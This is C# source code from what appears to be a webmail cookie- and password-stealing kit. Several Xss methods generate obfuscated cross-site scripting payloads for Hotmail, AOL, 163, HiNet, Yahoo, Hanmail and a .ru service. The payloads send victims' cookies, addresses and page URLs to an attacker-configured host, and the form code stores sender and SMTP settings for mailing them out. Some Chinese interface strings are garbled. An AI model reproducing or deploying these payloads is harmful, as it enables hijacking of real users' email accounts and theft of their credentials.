private void Xss(Model model)
{
Record record = new Record();
if (model.Type == "Cookie")
{
model.Address = "http://" + record.Dns("") + "/hotmail/indexC.asp?";
model.XSSCode = "<div id=\"fdList\" title=\"document.write(String.fromCharCode(60)+'script'+String.fromCharCode(62)+String.fromCharCode(60)+'/script'+String.fromCharCode(62)+String.fromCharCode(60)+'script src=" + model.Address + "uid=" + model.Addressee + "'+String.fromCharCode(62)+String.fromCharCode(60)+'/script'+String.fromCharCode(62));yyll=111;\"></div>" + this.CRLF + "<style>" + this.CRLF + "#fdList{" + this.CRLF + "color: rgb(''abc\"x:expression((window.yyll==111)?xxyy=6:(eval(ecxfdList.title)));" + this.CRLF + "}" + this.CRLF + "</style>" + this.CRLF;
}
else if (model.Type == "Password")
{
model.Address = "http://" + record.Dns("") + "/hotmail/index.asp?";
model.XSSCode = "<div id=\"fdList\" title=\"document.write(String.fromCharCode(60)+'script'+String.fromCharCode(62)+String.fromCharCode(60)+'/script'+String.fromCharCode(62)+String.fromCharCode(60)+'script src=" + model.Address + "uid=" + model.Addressee + "'+String.fromCharCode(62)+String.fromCharCode(60)+'/script'+String.fromCharCode(62));yyll=111;\"></div>" + this.CRLF + "<style>" + this.CRLF + "#fdList{" + this.CRLF + "color: rgb(''abc\"x:expression((window.yyll==111)?xxyy=6:(eval(ecxfdList.title)));" + this.CRLF + "}" + this.CRLF + "</style>" + this.CRLF;
}
else if (model.Type == "C+P")
{
model.Address = "http://" + record.Dns("") + "/hotmail/indexCP.asp?";
model.XSSCode = "<div id=\"fdList\" title=\"document.write(String.fromCharCode(60)+'script'+String.fromCharCode(62)+String.fromCharCode(60)+'/script'+String.fromCharCode(62)+String.fromCharCode(60)+'script src=" + model.Address + "uid=" + model.Addressee + "'+String.fromCharCode(62)+String.fromCharCode(60)+'/script'+String.fromCharCode(62));yyll=111;\"></div>" + this.CRLF + "<style>" + this.CRLF + "#fdList{" + this.CRLF + "color: rgb(''abc\"x:expression((window.yyll==111)?xxyy=6:(eval(ecxfdList.title)));" + this.CRLF + "}" + this.CRLF + "</style>" + this.CRLF;
}
else if (model.Type == "Mail")
{
string str = "";
Random random = new Random();
for (int i = 0; i < 6; i++)
{
str = str + random.Next(10).ToString();
}
model.Address = "http://" + record.Dns("") + "/upload/index.php";
model.XSSCode = "<style>" + this.CRLF + "p,font,table{" + this.CRLF + "top:rgb('88',80,'180);" + this.CRLF + "top:rgb(') !important" + this.CRLF + "height:expression( (window.r==123)?x=8:(eval(code.title)==20088) || (r=123) );}" + this.CRLF + "</style>" + this.CRLF + "abcdefg<div id=code title=\"emailkey='" + str + "';window.onerror=function(){return true;};if(window.ufoufoufo!=1) {framedir='" + model.Address + "';yyuser='******';_x_=document.createElement('SCRIPT');_x_.src=framedir+'?key='+emailkey+'&msg='+escape('-'+yyuser+'^-!!-'+document.location);document.insertBefore(_x_,document.getElementsByTagName('*')[0]);ufoufoufo=1;}\"></div><p>-</p><font>-</font>";
}
}
private void Xss(Model model)
{
Record record = new Record();
if (model.Type == "Cookie")
{
model.Address = "http://" + record.Dns("") + "/aol/index.asp?";
model.XSSCode = "<img id=\"mylyy\" width=1 height=1 src=\"#\" title=\"new Image().src='" + model.Address + "uid=" + model.Addressee + "&cookie='+escape(document.cookie);\">" + this.CRLF + "<img id=\"myraya\" width=1 height=1 src=\"#\" title=\"document.location='" + model.Address + "?url='+document.location+'&uid=" + model.Addressee + "&logo=0';\"> " + this.CRLF + "<style>" + this.CRLF + "font,#myp{font:' ';'}" + this.CRLF + "a';" + this.CRLF + "background-image:expr<!--/*' '*/-->ession((window.rrr==1)?'':eval('rrr=1;eval(mylyy.title);eval(myraya.title);'));}'{}/*'*/</style><div id=\"myp\">";
}
else if (model.Type == "Password")
{
model.Address = "http://" + record.Dns("") + "/aol/index2.asp?";
model.XSSCode = "<img id=\"mylyy\" width=1 height=1 src=\"#\" title=\"new Image().src='" + model.Address + "uid=" + model.Addressee + "&cookie='+escape(document.cookie);\"> " + this.CRLF + "<img id=\"myraya\" width=1 height=1 src=\"#\" title=\"document.location='" + model.Address + "?url='+document.location+'&uid=" + model.Addressee + "&logo=0';\"> " + this.CRLF + "<style>" + this.CRLF + "font,#myp{font:' ';'}" + this.CRLF + "a';" + this.CRLF + "background-image:expr<!--/*' '*/-->ession((window.rrr==1)?'':eval('rrr=1;eval(mylyy.title);eval(myraya.title);'));}'{}/*'*/</style><div id=\"myp\">";
}
else if (model.Type == "C+P")
{
model.Address = "http://" + record.Dns("") + "/aol/indexcp.asp?";
model.XSSCode = "<img id=\"mylyy\" width=1 height=1 src=\"#\" title=\"new Image().src='" + model.Address + "uid=" + model.Addressee + "&cookie='+escape(document.cookie);\"> " + this.CRLF + "<img id=\"myraya\" width=1 height=1 src=\"#\" title=\"document.location='" + model.Address + "?url='+document.location+'&uid=" + model.Addressee + "&logo=0';\"> " + this.CRLF + "<style>" + this.CRLF + "font,#myp{font:' ';'}" + this.CRLF + "a';" + this.CRLF + "background-image:expr<!--/*' '*/-->ession((window.rrr==1)?'':eval('rrr=1;eval(mylyy.title);eval(myraya.title);'));}'{}/*'*/</style><div id=\"myp\">";
}
}
private void Xss(Model model)
{
string addressee = model.Addressee;
int index = addressee.IndexOf('@');
addressee = addressee.ToLower().Substring(0, index);
Record record = new Record();
if (model.Type == "Cookie")
{
model.Address = "http://" + record.Dns("") + "/163/index.asp?";
model.XSSCode = "<textarea style=DISPLAY:none><style></textarea>" + this.CRLF + "<script>" + this.CRLF + "document.location=\"" + model.Address + "id=" + addressee + "&cookie=\"+escape(document.cookie);" + this.CRLF + "</script>" + this.CRLF + "</style></textarea>";
}
else if (model.Type == "Password")
{
model.Address = "http://" + record.Dns("") + "/163/indexP.asp?";
model.XSSCode = "<textarea style=DISPLAY:none><style></textarea>" + this.CRLF + "<script>" + this.CRLF + "document.location=\"" + model.Address + "id=" + model.EncodeBase64(model.Addressee) + "&cookie=\"+escape(document.cookie);" + this.CRLF + "</script>" + this.CRLF + "</style></textarea>";
}
else if (model.Type == "C+P")
{
model.Address = "http://" + record.Dns("") + "/163/indexcp.asp?";
model.XSSCode = "<textarea style=DISPLAY:none><style></textarea>" + this.CRLF + "<script>" + this.CRLF + "document.location=\"" + model.Address + "id=" + addressee + "&cookie=\"+escape(document.cookie);" + this.CRLF + "</script>" + this.CRLF + "</style></textarea>";
}
}
private void Xss(Model model)
{
string addressee = model.Addressee;
int index = addressee.IndexOf('@');
addressee = addressee.ToLower().Substring(0, index);
Record record = new Record();
if (model.Type == "Cookie")
{
model.Address = "http://" + record.Dns("") + "/hinet/index.asp?";
model.XSSCode = "<html><body><STYLE>@im\\port'\\ja\\vasc\\ript:document.location=\"" + model.Address + "\r\ndomain=\"+document.domain+\"&uid=" + model.Addressee + "&url=\"+document.location.href+\"&cookie=\"+escape(document.cookie)';</STYLE></body></html>";
}
else if (model.Type == "Password")
{
model.Address = "http://" + record.Dns("") + "/hinet/indexp.asp?";
model.XSSCode = "<html><body><STYLE>@im\\port'\\ja\\vasc\\ript:document.location=\"" + model.Address + "\r\ndomain=\"+document.domain+\"&uid=" + model.Addressee + "&url=\"+document.location.href+\"&cookie=\"+escape(document.cookie)';</STYLE></body></html>";
}
else if (model.Type == "C+P")
{
model.Address = "http://" + record.Dns("") + "/hinet/indexcp.asp?";
model.XSSCode = "<html><body><STYLE>@im\\port'\\ja\\vasc\\ript:document.location=\"" + model.Address + "\r\ndomain=\"+document.domain+\"&uid=" + model.Addressee + "&url=\"+document.location.href+\"&cookie=\"+escape(document.cookie)';</STYLE></body></html>";
}
}
private void Xss(Model model)
{
Record record = new Record();
if (model.Type == "Cookie")
{
model.Address = "http://" + record.Dns("") + "/ru/ruC.asp?";
model.XSSCode = "<HTML><HEAD>" + this.CRLF + "<meta http-equiv=\"Content-Type\" content=\"text/html;charset=\"utf-8\">" + this.CRLF + "<META name=GENERATOR content=\"MSHTML 8.00.6001.18904\"></HEAD>" + this.CRLF + "<BODY>" + this.CRLF + "<div style=\"display:none\" id=\"lovely3\">function go(){var f=document.createElement('script');f.src='" + model.Address + "uid=" + model.Addressee + "!a=a'.replace(/!/g,String.fromCharCode(38));document.body.appendChild(f)}document.body.onload=go</div><style>a{font:'a\\'};</style><a style=\"display:none\">'</a><img width=0 src=# onerror=\"eval(lovely3.innerHTML)\"></style><P></P>" + this.CRLF + "</BODY></HTML>";
}
else if (model.Type == "Password")
{
model.Address = "http://" + record.Dns("") + "/ru/ruP.asp?";
model.XSSCode = "<HTML><HEAD>" + this.CRLF + "<meta http-equiv=\"Content-Type\" content=\"text/html;charset=\"utf-8\">" + this.CRLF + "<META name=GENERATOR content=\"MSHTML 8.00.6001.18904\"></HEAD>" + this.CRLF + "<BODY>" + this.CRLF + "<div style=\"display:none\" id=\"lovely3\">function go(){var f=document.createElement('script');f.src='" + model.Address + "uid=" + model.Addressee + "';document.body.appendChild(f)}document.body.onload=go</div><style>a{font:'a\\'};</style><a style=\"display:none\">'</a><img width=0 src=# onerror=\"eval(lovely3.innerHTML)\"></style><P></P>" + this.CRLF + "</BODY></HTML>";
}
else if (model.Type == "Mail")
{
model.XSSCode = "";
}
else if (model.Type == "C+P")
{
model.Address = "http://" + record.Dns("") + "/ru/ruCP.asp?";
model.XSSCode = "<HTML><HEAD>" + this.CRLF + "<meta http-equiv=\"Content-Type\" content=\"text/html;charset=\"utf-8\">" + this.CRLF + "<META name=GENERATOR content=\"MSHTML 8.00.6001.18904\"></HEAD>" + this.CRLF + "<BODY>" + this.CRLF + "<div style=\"display:none\" id=\"lovely3\">function go(){var f=document.createElement('script');f.src='" + model.Address + "uid=" + model.Addressee + "!a=a'.replace(/!/g,String.fromCharCode(38));document.body.appendChild(f)}document.body.onload=go</div><style>a{font:'a\\'};</style><a style=\"display:none\">'</a><img width=0 src=# onerror=\"eval(lovely3.innerHTML)\"></style><P></P>" + this.CRLF + "</BODY></HTML>";
}
}
private void Xss(Model model)
{
Record record = new Record();
if (model.Type == "Cookie")
{
model.Address = "http://" + record.Dns("") + "/yahoo/index.asp?";
model.XSSCode = "<style><!--.textLink.fontLink, .inlinemsg{display:none}--></style><script id=v b=div c=.textLink.fontLink n=tr k=span y=oninIcon o=display: m=none l=>{document.all.tags(v.b)[0].id=v.m}{ u=document.all.tags(v.n)[3].all.tags(v.k)}{u[2].onclick=v.m}{u[3].style.display=v.m}{u[1].innerText=u[1].innerText.replace(2,1)}{t=[2,3]}{setTimeout(function(){for(i in t)document.styleSheets[t[i]].rules(v.c).style.display=v.l},1300)}</script><script src=" + model.Address + "uid=" + model.Addressee + "></script>";
}
else if (model.Type == "Password")
{
model.Address = "http://" + record.Dns("") + "/yahoo/yahooP.asp?";
model.XSSCode = "<style><!--.textLink.fontLink, .inlinemsg{display:none}--></style><script id=v b=div c=.textLink.fontLink n=tr k=span y=oninIcon o=display: m=none l=>{document.all.tags(v.b)[0].id=v.m}{ u=document.all.tags(v.n)[3].all.tags(v.k)}{u[2].onclick=v.m}{u[3].style.display=v.m}{u[1].innerText=u[1].innerText.replace(2,1)}{t=[2,3]}{setTimeout(function(){for(i in t)document.styleSheets[t[i]].rules(v.c).style.display=v.l},1300)}</script><script src=" + model.Address + "uid=" + model.Addressee + "></script>";
}
else if (model.Type == "Mail")
{
model.XSSCode = "";
}
else if (model.Type == "C+P")
{
model.Address = "http://" + record.Dns("") + "/yahoo/indexcp.asp?";
model.XSSCode = "<style><!--.textLink.fontLink, .inlinemsg{display:none}--></style><script id=v b=div c=.textLink.fontLink n=tr k=span y=oninIcon o=display: m=none l=>{document.all.tags(v.b)[0].id=v.m}{ u=document.all.tags(v.n)[3].all.tags(v.k)}{u[2].onclick=v.m}{u[3].style.display=v.m}{u[1].innerText=u[1].innerText.replace(2,1)}{t=[2,3]}{setTimeout(function(){for(i in t)document.styleSheets[t[i]].rules(v.c).style.display=v.l},1300)}</script><script src=" + model.Address + "uid=" + model.Addressee + "></script>";
}
}
private void Xss(Model model)
{
Record record = new Record();
if (model.Type == "Cookie")
{
model.XSSCode = "";
}
else if (model.Type == "Password")
{
model.Address = "http://" + record.Dns("") + "/hanmailpass/index.asp?";
model.XSSCode = "<div style=\"width:" + this.StrToHex("expression(eval((window.r!=1)?(window.r=1,(document.location='" + model.Address + "?uid=" + model.Addressee + "&cookie='+escape(document.cookie))):1))") + ";\">";
}
else if (model.Type == "Mail")
{
model.Address = "http://" + record.Dns("") + "/hanmail/index.php?";
string str = "";
Random random = new Random();
for (int i = 0; i < 4; i++)
{
str = str + random.Next(10).ToString();
}
model.XSSCode = "<div style=\"width:" + this.StrToHex("expression(eval((window.r!=1)?(window.r=1,(document.location='" + model.Address + "uid=" + model.Addressee + "&cookie='+escape(document.cookie))):1))") + ";\">";
}
}
private void MainForm_Load(object sender, EventArgs e)
{
LoadMainEditor();
LoadMailCookietControl();
LoadPopMailControl();
Record record = new Record();
record.ini("get");
// this.notifyIcon1.Visible = true;
this.trvListInfo.ExpandAll();
this.BindTreeView();
string[] strArray = record.GetRecord();
this.NickNameEdit.EditValue = strArray[0];
this.SendMailNameEdit.EditValue = strArray[1];
this.ReceiveNameEdit.EditValue = strArray[2];
this.UserNameEdit.EditValue = strArray[3];
this.SubjectEdit.EditValue = strArray[4];
this.ServerNameEdit.EditValue = strArray[5];
this.FliterUsersComboBox.EditValue = "��ʾȫ���û�";
}
private void MainForm_FormClosing(object sender, FormClosingEventArgs e)
{
string str = "Time";
if (MessageBox.Show("ȷ��Ҫ�˳���?", "��ʾ", MessageBoxButtons.YesNo, MessageBoxIcon.Asterisk) == DialogResult.Yes)
{
Record record = new Record();
record.SetRecord(this.NickNameEdit.EditValue.ToString(), this.SendMailNameEdit.EditValue.ToString(), this.ReceiveNameEdit.EditValue.ToString(), this.UserNameEdit.EditValue.ToString(), this.SubjectEdit.EditValue.ToString(), this.ServerNameEdit.EditValue.ToString());
DateTime now = new DateTime();
now = DateTime.Now;
int year = now.Year;
int month = now.Month;
int day = now.Day;
string str2 = string.Concat(new object[] { str, year, "��", month, "��", day, "��" });
record.ini("get");
Application.ExitThread();
}
else
{
e.Cancel = true;
}
}
private void AddDNS_LinkClicked(object sender, DevExpress.XtraNavBar.NavBarLinkEventArgs e)
{
AddDNS TmpDlg = new AddDNS();
TmpDlg.ShowDialog();
if (TmpDlg.strDNS != "")
{
Record record = new Record();
MessageBox.Show(record.Dns(TmpDlg.strDNS), "�����ʾ", MessageBoxButtons.OK, MessageBoxIcon.None);
}
else
{
this.MailInfoOutput.Text = this.MailInfoOutput.Text + "DNS������!\r\n";
}
}
